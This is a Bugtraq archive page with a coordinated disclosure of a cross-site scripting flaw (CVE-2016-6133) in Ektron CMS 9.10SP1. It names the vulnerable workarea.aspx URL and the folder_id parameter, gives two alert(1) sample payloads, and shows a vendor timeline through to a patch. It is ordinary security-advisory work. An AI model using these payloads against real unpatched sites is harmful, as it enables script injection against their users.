Bugtraq mailing list archives
Ektron Version 9.10SP1(Build 9.1.0.184) Cross Site Scripting
From: ghasseminia () gmail com
Date: Mon, 19 Jun 2017 05:56:32 GMT
# Vulnerability type: Cross Site Scripting # Vendor: Ektron # Product: Ektron Content Management System # Affected version: 9.10SP1(Build 9.1.0.184) # Patched version: 9.1.0.184SP3(9.1.0.184.3.127) # Credit: Siyavash Ghasseminia, Edmund Goh # CVE ID: CVE-2016-6133 # PROOF OF CONCEPT Vulnerable URL: /WorkArea/workarea.aspx?page=content.aspx&action=ViewContentByCategory&folder_id=0&LangType=1033 # VULNERABLE PARAMETERS: - folder_id # SAMPLE PAYLOAD - ',1);});alert(1);// Or - <script>alert(1)</script> # TIMELINE - 1/7/2016: Vulnerability found - 4/7/2016: Vendor informed - 13/7/2016: Vendor responded and acknowledged - 29/7/2016: Vendor fixed the issue - 19/6/2017: Public disclosure
Current thread:
- Ektron Version 9.10SP1(Build 9.1.0.184) Cross Site Scripting ghasseminia (Jun 19)
- <Possible follow-ups>
- Ektron Version 9.10SP1(Build 9.1.0.184) Cross Site Scripting ghasseminia (Jun 19)
- Ektron Version 9.10SP1(Build 9.1.0.184) Cross Site Scripting ghasseminia (Jun 19)